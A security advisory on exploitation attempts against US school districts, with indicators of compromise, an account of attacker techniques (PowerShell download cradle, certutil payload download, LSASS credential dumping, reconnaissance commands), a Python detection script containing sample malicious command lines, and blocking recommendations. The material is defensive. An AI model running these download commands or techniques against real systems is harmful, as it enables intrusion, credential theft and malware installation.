US School District Exploitation Attempts

May 2, 2022 | News

There has been a recent increase in activity targeting school districts across the United States that appears to be staging for ransomware and numerous crypto-mining campaigns, aimed at the critical remote-access and authentication servers students rely on.

Related Indicators of Compromise

  • 185.101.107[.]92
  • powershell iex(New-Object Net.WebClient).DownloadString('hxxp://185.101.107[.]92/lol.ps1')
  • "certutil.exe -urlcache -split -f hxxp:///checkit2.exe c:/windows/temp/checkit2.exe"

Summary of Exploitation Attempts

Detections have shown traffic to 185.101.107[.]92, an IP geolocated in Bucharest, Romania, which is flagged as malicious by 16 vendors on VirusTotal and is reported by AbuseIPDB to be associated with crypto-mining activity. Shodan also reports that the IP belongs to an Ubuntu machine with ports 21, 22, and 80 exposed, which suggests it may be a staging point the threat actors use to conceal their actual IP address.

Malicious Java processes spawning PowerShell and cmd prompts executing internal enumeration, privilege escalation, credential theft, and external downloads via PowerShell have been observed.

The activity starts with a common threat actor tactic known as a download cradle, which downloads post-exploitation and exfiltration tools and loads them straight into memory, evading detection on disk. We are also seeing malicious use of certutil.exe, a legitimate Windows executable commonly used to display certification authority configuration information and retrieve certificates. Here, however, the threat actors use it to download a payload rather than a certificate.

In this case, an executable may be stored in the temp folder and could easily be overlooked without proper investigation. Detections for LSASS dumping (credential theft) were also observed; these are typically seen when tools like Mimikatz or ProcDump are executed. Such tools can be abused to steal credentials for exfiltration and password cracking as well as privilege escalation, bringing the threat actor one step closer to domain admin and to completing their actions on objectives.

In one school district case, discovery found: whoami, systeminfo, ipconfig, net user, net local admin, net group "domain computers", and many more reconnaissance commands. In another case, multiple users and a service account with high privilege were identified as having connected to the associated malicious IP.
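The behaviours described above (a Java process spawning shells, the PowerShell download cradle, certutil fetching over HTTP, recon commands, and traffic to the listed IP) can be turned into simple process-creation detections. The following is an added example, not code from the advisory or its author; the event records and their field names (parent, image, cmdline) are constructed, hypothetical telemetry modelled on EDR/Sysmon process-creation events.

```python
import re

# Constructed process-creation events with hypothetical field names; sample records, not real captured logs.
EVENTS = [
    {"parent": "java.exe", "image": "powershell.exe",
     "cmdline": "powershell iex(New-Object Net.WebClient).DownloadString('http://185.101.107.92/lol.ps1')"},
    {"parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://185.101.107.92/checkit2.exe c:/windows/temp/checkit2.exe"},
    {"parent": "java.exe", "image": "cmd.exe", "cmdline": "cmd /c whoami"},
    {"parent": "java.exe", "image": "cmd.exe", "cmdline": 'cmd /c net group "domain computers" /domain'},
    {"parent": "explorer.exe", "image": "certutil.exe", "cmdline": "certutil -store My"},
    {"parent": "svchost.exe", "image": "powershell.exe", "cmdline": "powershell Get-Date"},
]

# IEX combined with a WebClient download in either order: the in-memory download cradle.
CRADLE = re.compile(
    r"(?:iex|invoke-expression).*(?:downloadstring|net\.webclient)"
    r"|(?:downloadstring|net\.webclient).*(?:iex|invoke-expression)", re.I)
# certutil fetching over HTTP(S) with -urlcache: a payload download, not a certificate lookup.
CERTUTIL_DL = re.compile(r"certutil(?:\.exe)?\s.*-urlcache\b.*\bhttps?://", re.I)
# Reconnaissance commands named in the advisory (substring match on the lowercased command line).
RECON = ("whoami", "systeminfo", "ipconfig", "net user", "net localgroup", "net group")
# The IP named in the advisory; extend from your own intel feed.
BAD_IPS = {"185.101.107.92"}
SHELLS = {"cmd.exe", "powershell.exe"}


def classify(evt):
    # Returns the list of detection names that fire for one process-creation event.
    cmd = evt["cmdline"]
    findings = []
    if CRADLE.search(cmd):
        findings.append("download_cradle")
    if CERTUTIL_DL.search(cmd):
        findings.append("certutil_download")
    if any(ip in cmd for ip in BAD_IPS):
        findings.append("known_bad_ip")
    # The advisory describes Java as the process spawning shells; a Java parent launching one is suspicious on its own.
    if evt["parent"].lower() == "java.exe" and evt["image"].lower() in SHELLS:
        findings.append("java_spawned_shell")
    if any(term in cmd.lower() for term in RECON):
        findings.append("recon_command")
    return findings


def triage(events):
    # Returns (index, findings) for every event that fired at least one detection.
    return [(i, f) for i, evt in enumerate(events) if (f := classify(evt))]


if __name__ == "__main__":
    for idx, hits in triage(EVENTS):
        print(idx, EVENTS[idx]["image"], ", ".join(hits))
```

Running it flags the first four constructed events and leaves the benign certutil and PowerShell invocations alone; the substring recon match is deliberately broad and should be scoped to unusual parents (such as java.exe) before being used as an alert on its own.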

Recommendations

  • Use Geo-IP and block access to/from Romania if not needed in your environment
  • Create access lists to block 185.101.107.92
  • Review Internet traffic for any Indicators of Compromise

If you would like more information about this topic, please visit our get in touch page and contact us today.
